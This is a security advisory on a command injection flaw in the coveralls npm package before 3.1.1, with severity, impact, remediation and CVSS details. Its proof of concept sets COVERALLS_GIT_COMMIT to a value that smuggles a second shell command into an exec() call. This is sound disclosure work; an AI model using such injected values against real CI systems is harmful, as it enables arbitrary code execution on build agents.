Command Injection Vulnerability In Coveralls: CX-2021-4801

Severity

Severity: 9.3 (Critical)

Advisory Timeline Summary
Affected versions of the coveralls npm package are vulnerable to command injection through unsafe use of exec in fetchGitData.js: a value read from the process environment is interpolated into a shell command string, so shell metacharacters in that value are executed.

Product

coveralls npm package, versions before 3.1.1.

Impact

This issue may lead to arbitrary command execution, and therefore remote code execution, whenever the vulnerable code path is reached with attacker-controlled input, for example through the COVERALLS_GIT_COMMIT environment variable used in the proof of concept below. Because coveralls typically runs inside CI jobs, anyone who can influence that variable can run commands on the build agent with the privileges of the job.

Steps To Reproduce

poc.js :

// Attacker-controlled value: a shell command separator followed by a
// command, placed in the environment variable that fetchGitData.js
// interpolates into its git command string.
process.env.COVERALLS_GIT_COMMIT = "; touch HACKED;"

var coveralls = require("coveralls")
// getBaseOptions() reaches the vulnerable exec() call in fetchGitData.js.
// The callback receives (err, options); its result is irrelevant to the PoC.
coveralls.getBaseOptions((err, options) => {});

Expected Result:

A file named HACKED is created in the current working directory, showing that the contents of the environment variable were executed by the shell rather than treated as a commit identifier.

Remediation

  1. Do not let untrusted input reach the vulnerable parameters when using the library; this includes the environment variables the library reads, which in CI are often writable by pull request authors or pipeline configuration.
  2. Update coveralls to version 3.1.1 or later.

Properties

Attack Vector: Local

Attack Complexity: Low

Privileges Required: None

User Interaction: None

Scope: Changed

Confidentiality: High

Integrity: High

Availability: High

Credit

This issue was discovered and reported by Checkmarx SCA Security Analyst Adar Zandberg.

Resources

  1. Commit 565da5f